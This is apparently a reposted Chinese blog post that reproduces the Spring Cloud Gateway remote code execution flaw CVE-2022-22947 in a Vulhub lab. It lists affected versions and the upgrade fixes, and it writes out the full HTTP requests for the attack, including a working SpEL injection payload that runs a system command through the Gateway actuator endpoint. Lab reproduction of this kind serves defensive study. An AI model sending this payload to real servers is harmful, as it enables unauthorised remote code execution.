码上快乐

相关内容   简体   繁体

Spring Cloud Gateway 远程代码执行漏洞复现CVE-2022-22947

本文转载自  查看原文  2022-03-31 11:02  630    网络安全

漏洞说明

2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。

漏洞影响范围

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

旧的、不受支持的版本也会受到影响

漏洞复现

本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场,需注意将请求中的代码更换为靶机所在IP。

1.进入靶场环境:cd Vulhub/spring/CVE-2022-22947

 

 

 2.启动服务:docker-compose up -d

 

 3.访问靶场服务器IP+端口:http://192.168.1.76:8080

 

 4.构造包含恶意请求的路由,利用BP进行发送:

POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }

 

 5.然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行:

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 6.发送如下数据包可查看结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 7.最后发送如下数据包进行清理,删除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close

 

 8.再次刷新路由:

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 9.以上漏洞环境使用完成后,使用以下命令进行环境移除:docker-compose down

漏洞修复

临时解决方案

    如果不需要Actuator端点,可以通过management.endpoint.gateway.enable:false配置将其禁用

    如果需要Actuator端点,则应使用Spring Security对其进行保护。

官方升级补丁

    3.1.x版本用户及时升级到3.1.1+

    3.0.x版本用户及时升级到3.0.7+


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 关于Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)的安全告知 Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947) CVE-2022-22947 Spring Cloud Gateway SPEL RCE复现 CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22965 Spring Framework远程代码执行漏洞复现 Spring Framework远程代码执行漏洞复现(CVE-2022-22965) 漏洞复现-CVE-2016-4977-Spring远程代码执行 CVE-2020-14645 Weblogic远程代码执行漏洞复现 Samba远程代码执行漏洞(CVE-2017-7494)复现 漏洞复现-CVE-2017-4971-Spring Web Flow 远程代码执行
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM